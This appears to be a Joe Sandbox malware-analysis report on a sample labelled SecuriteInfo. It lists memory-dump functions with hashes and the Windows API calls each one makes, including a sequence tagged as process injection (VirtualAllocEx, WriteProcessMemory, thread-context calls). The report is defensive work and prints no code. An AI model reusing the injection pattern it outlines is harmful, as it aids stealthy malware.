Source File: 00000000.00000002.1613424993.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11b0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: XXq$XXq$XXq$XXq$XXq
API String ID: 0-795579351
Opcode ID: e5f78ee8e3ac401b88506b68edb0ca20097783626d0766e4c4eb5f65a38f017f
Instruction ID: 39dff4d038b7271155b99294049dddf14a31539e8980e77b9a311755228a0ec4
Opcode Fuzzy Hash: e5f78ee8e3ac401b88506b68edb0ca20097783626d0766e4c4eb5f65a38f017f
Instruction Fuzzy Hash: B9A173B5A0021D8FDB18CF68D4D4AAD7BE5BF88314F16846AEA15DB391DB30DC42CB91

Function 014EA791 Relevance: 6.1, APIs: 4, Instructions: 137
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 014EA81E
GetCurrentThread.KERNEL32 ref: 014EA85B
GetCurrentProcess.KERNEL32 ref: 014EA898
GetCurrentThreadId.KERNEL32 ref: 014EA8F1

Memory Dump Source

Source File: 00000000.00000002.1614009759.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14e0000_SecuriteInfo.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 4cc64269ade1182d3b1ff8b411e3fb2faa96688a06d39f20248f0e03d0725bb4
Instruction ID: 4d8c02389ae15ec4036242751ab5d45c4d556046b0fd71b30d352210e6457ca2
Opcode Fuzzy Hash: 4cc64269ade1182d3b1ff8b411e3fb2faa96688a06d39f20248f0e03d0725bb4
Instruction Fuzzy Hash: E85146B0D003498FEB28DFA9D448BDEBBF1FB88315F24845AE419A72A0D7345945CF62

Function 014EA7A0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 014EA81E
GetCurrentThread.KERNEL32 ref: 014EA85B
GetCurrentProcess.KERNEL32 ref: 014EA898
GetCurrentThreadId.KERNEL32 ref: 014EA8F1

Memory Dump Source

Source File: 00000000.00000002.1614009759.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14e0000_SecuriteInfo.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 2a94d7f783d60d299a61f35fa7b2851d872515446dae4f5b708bdfe282c6d35f
Instruction ID: 134ed5e73adf4b311c9666f6ef7b1a1a33df59fa889044cb9184e77def4fbdeb
Opcode Fuzzy Hash: 2a94d7f783d60d299a61f35fa7b2851d872515446dae4f5b708bdfe282c6d35f
Instruction Fuzzy Hash: 835159B0D003098FEB14DFAAD448B9EBBF1FB88315F20845AD419A72A0D7345945CF66

Function 011B69D8 Relevance: 4.3, Strings: 3, Instructions: 585COMMON

Download Yara Rule

Strings

Hq, xrefs: 011B6D8C
d8q, xrefs: 011B6A30
Hq, xrefs: 011B6D59

Memory Dump Source

Source File: 00000000.00000002.1613424993.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11b0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: Hq$Hq$d8q
API String ID: 0-685483251
Opcode ID: 12e3815793d553ab1aae54d69dab86bd05be8975d089d3b6a93c7954e2a1ddcb
Instruction ID: d6a3207c7c5c4845eb083c6618fe0dcce21d79891b1d53a0748e467139608e25
Opcode Fuzzy Hash: 12e3815793d553ab1aae54d69dab86bd05be8975d089d3b6a93c7954e2a1ddcb
Instruction Fuzzy Hash: 2D22F0307002158FDB299B78D8947AE7BA2BF88310F15856AE516CF3A5DB70DC46CB92

Function 011BDEA8 Relevance: 4.0, Strings: 3, Instructions: 252COMMON

Download Yara Rule

Strings

$q, xrefs: 011BDFB4
Hq, xrefs: 011BE054
$q, xrefs: 011BDFA8

Memory Dump Source

Source File: 00000000.00000002.1613424993.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11b0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: Hq$$q$$q
API String ID: 0-405414136
Opcode ID: 15c469047ae5ed1317c74d15a1acf7007235b78a61e3cb7c242db3ed8c786734
Instruction ID: 7df809d348d48e5da984e284afa4cdef31f253d357d043a99bebac6e168ec745
Opcode Fuzzy Hash: 15c469047ae5ed1317c74d15a1acf7007235b78a61e3cb7c242db3ed8c786734
Instruction Fuzzy Hash: 3981B1303042159FDF2DAF79A8946FE3BA6BB84240B1A4429F912CF394DF35CC069792

Function 011B5360 Relevance: 3.9, Strings: 3, Instructions: 113COMMON

Download Yara Rule

Strings

$q, xrefs: 011B549B
8q, xrefs: 011B54BD
$q, xrefs: 011B5431

Memory Dump Source

Source File: 00000000.00000002.1613424993.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11b0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: 8q$$q$$q
API String ID: 0-4185369618
Opcode ID: d129b44fec0de13549f8642ee6c4734fea7400e92d04b91d2d3d902c6462eb83
Instruction ID: ad207926ab77e34ac3a9c202185e9cf146182e31b3b8735f8f0de081d35f61b7
Opcode Fuzzy Hash: d129b44fec0de13549f8642ee6c4734fea7400e92d04b91d2d3d902c6462eb83
Instruction Fuzzy Hash: 96310B70B04305CFDBA98B6894907ADBBE3BF84321F26446AD505DB3A1EBB88C41C753

Function 011BEA28 Relevance: 3.3, Strings: 2, Instructions: 770COMMON

Download Yara Rule

Strings

$q, xrefs: 011BF54C
$q, xrefs: 011BF56F

Memory Dump Source

Source File: 00000000.00000002.1613424993.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11b0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: $q$$q
API String ID: 0-3126353813
Opcode ID: fde4ac0d3e89aae7b79a276338ba122b93fb10da1ed8396c774db03394e624a4
Instruction ID: a988bcbf7e05704a03ba46d6c58e10dccc7ab6566120bc70f91035808a5305e8
Opcode Fuzzy Hash: fde4ac0d3e89aae7b79a276338ba122b93fb10da1ed8396c774db03394e624a4
Instruction Fuzzy Hash: 69621574A002198FEB68DBA4C894BDEBB72FF98300F1081A9D10AAB764DF355D46DF51

Function 011BE238 Relevance: 2.6, Strings: 2, Instructions: 137COMMON

Download Yara Rule

Strings

Hq, xrefs: 011BE31F
Hq, xrefs: 011BE352

Memory Dump Source

Source File: 00000000.00000002.1613424993.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11b0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: Hq$Hq
API String ID: 0-925789375
Opcode ID: a69960af94a7852d0a07815c61f10a90a8135980b0d6b119a925b63e84284d42
Instruction ID: 8654391cadb9501b0c9c539aee3dbeddef323a191fd0d03f0f9b1bf36e55ff7a
Opcode Fuzzy Hash: a69960af94a7852d0a07815c61f10a90a8135980b0d6b119a925b63e84284d42
Instruction Fuzzy Hash: 0C41D2706052159FEB19DF68C880AEE7BF2FF89204F058659E9459B391DB34DC01D7A2

Function 06B09FF0 Relevance: 1.8, Strings: 1, Instructions: 594COMMON

Download Yara Rule

Strings

W@q, xrefs: 06B0A6FE

Memory Dump Source

Source File: 00000000.00000002.1625235622.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b00000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: W@q
API String ID: 0-2513909740
Opcode ID: cfc2ad74115ddc567ac31e1c4f77a841cc14aa502e0b961e1d89c7156cfc0cf1
Instruction ID: 5229605aae89deddcc7279e02281f2171bc865da6fe5503d4e00672626a8a68c
Opcode Fuzzy Hash: cfc2ad74115ddc567ac31e1c4f77a841cc14aa502e0b961e1d89c7156cfc0cf1
Instruction Fuzzy Hash: BA122770A083008FD705BBB9E89962E7FF2FF95300F5649AAD585D7295DE389C09C392

Function 014E8508 Relevance: 1.7, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 014E875E

Memory Dump Source

Source File: 00000000.00000002.1614009759.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14e0000_SecuriteInfo.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 0dc01e887a392ea6486af932115c147153e9494ca0a9b250d655fcfc8b6cfac0
Instruction ID: ce1657f32f5957eb2831d5769cba64c56d8c25e7be4ade5973149e484c37cf58
Opcode Fuzzy Hash: 0dc01e887a392ea6486af932115c147153e9494ca0a9b250d655fcfc8b6cfac0
Instruction Fuzzy Hash: 1D714770A00B068FDB24DF29D45475BBBF1BF88201F108A2ED49AD7B60DB75E945CB91

Function 014EEE04 Relevance: 1.6, APIs: 1, Instructions: 119COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 014EEF22

Memory Dump Source

Source File: 00000000.00000002.1614009759.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14e0000_SecuriteInfo.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: c1dcd82266c3ebc8150f9da56621aea8ce0edb1f81b49d6eec76828d41a23d15
Instruction ID: d53084fec8d34124291ab55b08e2ef6b124d9972e90fc60b34b81fc9a89448bc
Opcode Fuzzy Hash: c1dcd82266c3ebc8150f9da56621aea8ce0edb1f81b49d6eec76828d41a23d15
Instruction Fuzzy Hash: 6A51DFB1C10309EFDB14CF99C884ADEBBF5BF48310F24852AE919AB210D775A945CF90

Function 014EEE10 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 014EEF22

Memory Dump Source

Source File: 00000000.00000002.1614009759.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14e0000_SecuriteInfo.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: b8fae370efa5770750232b9360b6764052d1c583a975a1c58ed0c17672a0f6b9
Instruction ID: d1c06280312e25eafc8c8c4190ce1b855d869ef5ca31dafcb4e040b721b52896
Opcode Fuzzy Hash: b8fae370efa5770750232b9360b6764052d1c583a975a1c58ed0c17672a0f6b9
Instruction Fuzzy Hash: B541BEB1D10309EFDB14CF9AC884ADEBBF5BF48310F24852AE819AB250D7759945CF90

Function 06A77CFF Relevance: 1.6, APIs: 1, Instructions: 95fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000), ref: 06A77DA8

Memory Dump Source

Source File: 00000000.00000002.1625040125.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a70000_SecuriteInfo.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 76caac1c3b9323bb648470c94eecbcd3f550d575898d0bd5a3a25d4364a16008
Instruction ID: aed13b5074dfadcd1c44868fe5baeaf6cc7ea80aec6370e70305e84b5bfc0c13
Opcode Fuzzy Hash: 76caac1c3b9323bb648470c94eecbcd3f550d575898d0bd5a3a25d4364a16008
Instruction Fuzzy Hash: 8C31B275C097898FCB12DFA5C8107DABFB4AF07210F1A41DAC494AB293D7385945CFA6

Function 06D48FAD Relevance: 1.6, APIs: 1, Instructions: 82memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 06D4904B

Memory Dump Source

Source File: 00000000.00000002.1625695149.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d40000_SecuriteInfo.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 262be30f1e849ea0299dc10888bd9ca036628b7ee313eafd703ce872ebee59fc
Instruction ID: b01c428e47af0c0769ae7201d986850a0b16faaf49a613fe549a162d59b80e37
Opcode Fuzzy Hash: 262be30f1e849ea0299dc10888bd9ca036628b7ee313eafd703ce872ebee59fc
Instruction Fuzzy Hash: 8E212AB6D01209AFCB11DF9AD841BDFBBF8EB48310F108429E858AB250D3759A45CFA1

Function 06D3C1C8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06D3C258

Memory Dump Source

Source File: 00000000.00000002.1625599907.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_SecuriteInfo.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 7e1265dfdc42a5c020c0e8b60a3806304a4ebd6cbb1b14260f4ef8d8e31d8b87
Instruction ID: 77675947660667132b2f52ed1503d70163e08024f588933b2100ef832433734b
Opcode Fuzzy Hash: 7e1265dfdc42a5c020c0e8b60a3806304a4ebd6cbb1b14260f4ef8d8e31d8b87
Instruction Fuzzy Hash: A7213675D103199FDB10DFAAC981BEEBBF5FF48310F50842AE919A7240C7789945CBA4

Function 014EADEA Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014EAE77

Memory Dump Source

Source File: 00000000.00000002.1614009759.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14e0000_SecuriteInfo.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 368b2941e100379350d7d21f05abc38dd202a1526e551e82c6076275a684fe2f
Instruction ID: 341eae0aa1cd77fd98e6d6ca38a75ce4a4c070039e7eba5eee74b04f9d37beaf
Opcode Fuzzy Hash: 368b2941e100379350d7d21f05abc38dd202a1526e551e82c6076275a684fe2f
Instruction Fuzzy Hash: D521E3B5D003099FDB10CFAAD885ADEBBF5EF48320F14841AE919A3350D379A945CFA1

Function 06D3CBF8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D3CC76

Memory Dump Source

Source File: 00000000.00000002.1625599907.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_SecuriteInfo.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 866196f083057e1a4762273a98f644287cb296d27ac34f7dd959abf44a0464d9
Instruction ID: b31414b08742ade207dae6a298ad59f6a4804753c914fe6a452fcc1b9136fc6d
Opcode Fuzzy Hash: 866196f083057e1a4762273a98f644287cb296d27ac34f7dd959abf44a0464d9
Instruction Fuzzy Hash: 45211571D103098FDB24DFAAC885BEEBBF4EF48320F54842AD559A7240CB789945CFA4

Function 06D3B780 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64GetThreadContext.KERNEL32(?,00000000), ref: 06D3B7FE

Memory Dump Source

Source File: 00000000.00000002.1625599907.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_SecuriteInfo.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 47b2c6797ae7500cd80aee762f1caf83b727a0b29396e4733035e263b834dfd6
Instruction ID: 5d7f5ac261a61f20c0e4fe592cc775e4e130d4b03f024e9e88dc10dca7034238
Opcode Fuzzy Hash: 47b2c6797ae7500cd80aee762f1caf83b727a0b29396e4733035e263b834dfd6
Instruction Fuzzy Hash: 9E211571D003098FDB14DFAAC885BEEBBF4EF48324F54842AD559A7240DB789945CFA4

Function 014EADF0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014EAE77

Memory Dump Source

Source File: 00000000.00000002.1614009759.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14e0000_SecuriteInfo.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 8d3ee28177c6409d70fb964fb96da75156c2459310200c14a8aa0bb494648930
Instruction ID: 3b3859fd381adf75cc7ecc6d2bc7e2c71cbea04a66fed4ad42c1d3f32d3b4a8d
Opcode Fuzzy Hash: 8d3ee28177c6409d70fb964fb96da75156c2459310200c14a8aa0bb494648930
Instruction Fuzzy Hash: 9E21C4B5D003499FDB10CFAAD984ADEBBF5EF48320F14841AE918A3350D375A944CFA5

Function 06D3C970 Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

VirtualProtectEx.KERNEL32(?,?,?,?,?), ref: 06D3C9E7

Memory Dump Source

Source File: 00000000.00000002.1625599907.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_SecuriteInfo.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: a7f1ba6e4a502b5138bb3d266f0c26a76e80a3cf00901b27139606d3e07c930f
Instruction ID: d19a869ab101d954b99024f4bb97940f60bd59476d931ea3479369000647eace
Opcode Fuzzy Hash: a7f1ba6e4a502b5138bb3d266f0c26a76e80a3cf00901b27139606d3e07c930f
Instruction Fuzzy Hash: 4C211871C003099FDB14DFAAC841BEEBBF5EF48320F55842AD559A7240CB799945CFA1

Function 06A77D38 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000), ref: 06A77DA8

Memory Dump Source

Source File: 00000000.00000002.1625040125.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a70000_SecuriteInfo.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 8c4b3df87271cf5423ace301d7f6b68e15eecaa6d61747f5dd34f75a64755719
Instruction ID: 4c504c9e5cf30b0d02e1f99ef5d709390a92e840a1ca4daa6c702c5148d26d05
Opcode Fuzzy Hash: 8c4b3df87271cf5423ace301d7f6b68e15eecaa6d61747f5dd34f75a64755719
Instruction Fuzzy Hash: 0A1147B1C0061A9BCB14DF9AC845BEEFBF4FF48320F11812AD818A7240D738A945CFA5

Function 06D327D6 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 06D3284B

Memory Dump Source

Source File: 00000000.00000002.1625599907.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_SecuriteInfo.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 410fa2c338fd3924adcff51ea67d91efccca52afe77d64139cdcc3a3fc615a1c
Instruction ID: 33312fd47d575bc2f1197ce016e0a65199e2fe382685045909feac22c998963b
Opcode Fuzzy Hash: 410fa2c338fd3924adcff51ea67d91efccca52afe77d64139cdcc3a3fc615a1c
Instruction Fuzzy Hash: 9521D675D002499FDB10DF9AC885BDEFBF4FB48320F108429E958A7251D778A645CFA1

Function 06D48FD8 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 06D4904B

Memory Dump Source

Source File: 00000000.00000002.1625695149.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d40000_SecuriteInfo.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: af1e32f161e7e48142ae5a6790ed173e8b2907ef2082bf87432dc900627c11e6
Instruction ID: 9455eba29942e81bbc60175dc0095d8373e87b14bad07aabd55761fc458d8b21
Opcode Fuzzy Hash: af1e32f161e7e48142ae5a6790ed173e8b2907ef2082bf87432dc900627c11e6
Instruction Fuzzy Hash: 6921D675D002499FDB10DF9AC885BDEFBF4EB48320F108429E958A7250D379A945CFA1

Function 06D327D8 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 06D3284B

Memory Dump Source

Source File: 00000000.00000002.1625599907.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_SecuriteInfo.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 11d5c996fef957862747a2156ccb031806fe5f29143ad39538b70166b04dcf72
Instruction ID: 456508b2902c4e7bb71739f4105f458c8b04efb19fd9d5dab8a1d38197523b63
Opcode Fuzzy Hash: 11d5c996fef957862747a2156ccb031806fe5f29143ad39538b70166b04dcf72
Instruction Fuzzy Hash: 1721D675D002499FDB10DF9AC885BDEFBF4FB48320F108429E958A7251D378A645CFA1

Function 014E8978 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,014E87D9,00000800,00000000,00000000), ref: 014E89EA

Memory Dump Source

Source File: 00000000.00000002.1614009759.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14e0000_SecuriteInfo.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: bed646bcbacd3eb536969931c12ca687192d8f180c0b900e8c9f9d26300c3baf
Instruction ID: 82ed7374a28a502dbb2e0a410cab6dae54aedad37b4e76b51d93a565aa018664
Opcode Fuzzy Hash: bed646bcbacd3eb536969931c12ca687192d8f180c0b900e8c9f9d26300c3baf
Instruction Fuzzy Hash: A21103B6C002098FDB14DF9AC844ADEFBF4EB48310F14842AD969A7210C779A545CFA5

Function 014E7AB0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,014E87D9,00000800,00000000,00000000), ref: 014E89EA

Memory Dump Source

Source File: 00000000.00000002.1614009759.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14e0000_SecuriteInfo.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 44193ef6b70f571b11f7564c3d4355c0ce2d22c61c2e49161de37b53f1756fd8
Instruction ID: 0de209fcf4f44dee5eae97fc228aa6804f61b91df2fb9785b91d9b6946462a6f
Opcode Fuzzy Hash: 44193ef6b70f571b11f7564c3d4355c0ce2d22c61c2e49161de37b53f1756fd8
Instruction Fuzzy Hash: 681103B6C003098FDB24DF9AC848B9EFBF4EB48310F10842AD559A7210C375A545CFA5

Function 06D3BE50 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 06D3BEBE

Memory Dump Source

Source File: 00000000.00000002.1625599907.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_SecuriteInfo.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 112fac8a488662bf67a0d7de4af815ba489f75133a46bc61c1d3ddac925706e0
Instruction ID: 0330481d9feb45a3c7b7f4ed8c6fdfa0cbcb7b13f6902c9f26b353efddc71867
Opcode Fuzzy Hash: 112fac8a488662bf67a0d7de4af815ba489f75133a46bc61c1d3ddac925706e0
Instruction Fuzzy Hash: 40111471C003499FDB24DFAAC845BDEBBF5AB48320F14841AE519A7250CB759940CBA0

Function 06D3CE80 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 06D3CEE2

Memory Dump Source

Source File: 00000000.00000002.1625599907.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_SecuriteInfo.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 6c27304add7b475844ac38ecf8d49afbdebc338728e8b7385b52c7f33f99fbca
Instruction ID: a0219dbaf8ae0d04c7c7b410024376e115dfc6051dad85d802b09a854ecc96f8
Opcode Fuzzy Hash: 6c27304add7b475844ac38ecf8d49afbdebc338728e8b7385b52c7f33f99fbca
Instruction Fuzzy Hash: F8112571D003498FDB24DFAAC84579EFBF5AB88220F24841AD529B7640CA79A945CBA4

Function 06D32C48 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06D3D505

Memory Dump Source

Source File: 00000000.00000002.1625599907.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_SecuriteInfo.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: c5fcbb695a26b4a0525435405e5fd5cfacfbccef45b8469c4025f17644628b91
Instruction ID: 993fdb7b20ae2001c0ef3ce804fb6594ce4fbb0dc885f004fadc40a419ca5341
Opcode Fuzzy Hash: c5fcbb695a26b4a0525435405e5fd5cfacfbccef45b8469c4025f17644628b91
Instruction Fuzzy Hash: 691103B58003499FDB20DF9AC845BEEBBF8FB49324F10841AE518A7240C375A944CFA1

Function 014E86F8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 014E875E

Memory Dump Source

Source File: 00000000.00000002.1614009759.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14e0000_SecuriteInfo.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 1756adaacbdf086a0a523a1c4a0221a277b2d1d00688db29082add85f9f31e57
Instruction ID: 11f32a1d102b3dc1decec2df6acc3a8c98014a50406d8b07e4e8b74a097d54db
Opcode Fuzzy Hash: 1756adaacbdf086a0a523a1c4a0221a277b2d1d00688db29082add85f9f31e57
Instruction Fuzzy Hash: BF110FB5C0034A8FDB24DF9AC844ADEFBF5EB88221F10842AD529A7210C379A545CFA1

Function 06B0AF80 Relevance: 1.5, Strings: 1, Instructions: 227COMMON

Download Yara Rule

Strings

4'q, xrefs: 06B0AFE9

Memory Dump Source

Source File: 00000000.00000002.1625235622.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b00000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: 78119df209bcb63ddbc977ae42400653cdf884e28b2fc6ef70f2493db20bff97
Instruction ID: dc24610bc85b15700eb35f936b62a68de0ecd2c1c0b1c18cd50e76e66d400bd5
Opcode Fuzzy Hash: 78119df209bcb63ddbc977ae42400653cdf884e28b2fc6ef70f2493db20bff97
Instruction Fuzzy Hash: 44719E70B00215CFDB04EBB9E485A3E7FF6BB98301F518569A445DB398EA39ED04C791

Function 011B5148 Relevance: 1.4, Strings: 1, Instructions: 145COMMON

Download Yara Rule

Strings

8q, xrefs: 011B519C

Memory Dump Source

Source File: 00000000.00000002.1613424993.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11b0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: 8q
API String ID: 0-4083045702
Opcode ID: 2e5bbe154d84394315c6b46612a2f12b97fa749a6a0cf04b4da9358e5609ead1
Instruction ID: b650ae3550a0b6a902f981851f80ae6bb96d19660e306040be51b0e10bfea467
